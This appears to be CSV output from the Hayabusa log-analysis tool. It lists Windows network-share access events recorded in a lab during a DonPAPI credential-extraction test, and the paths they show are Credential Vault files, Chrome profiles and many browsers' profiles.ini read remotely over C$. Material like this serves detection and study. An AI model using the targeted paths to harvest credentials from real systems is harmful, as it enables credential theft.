07:16:03.717 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.735 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.735 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.735 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.750 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.750 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.750 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\system32\config\systemprofile\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.750 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.750 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI 
full extraction.evtx +2021-12-12 07:16:03.766 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.766 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.766 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.766 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.766 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.766 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.781 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.781 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.781 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.781 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share 
Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.781 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.781 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.797 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.797 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.797 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.797 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.797 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.797 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full 
extraction.evtx +2021-12-12 07:16:03.813 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.813 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.813 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.813 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.813 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.813 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.830 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.832 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.835 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.835 
+00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.835 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.835 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.835 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.835 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.835 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.851 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.852 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.852 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.852 
+00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.852 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.852 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.852 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.868 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.868 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.868 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.868 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.868 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.868 
+00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.884 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.884 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.884 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.884 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.884 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.884 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.899 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.899 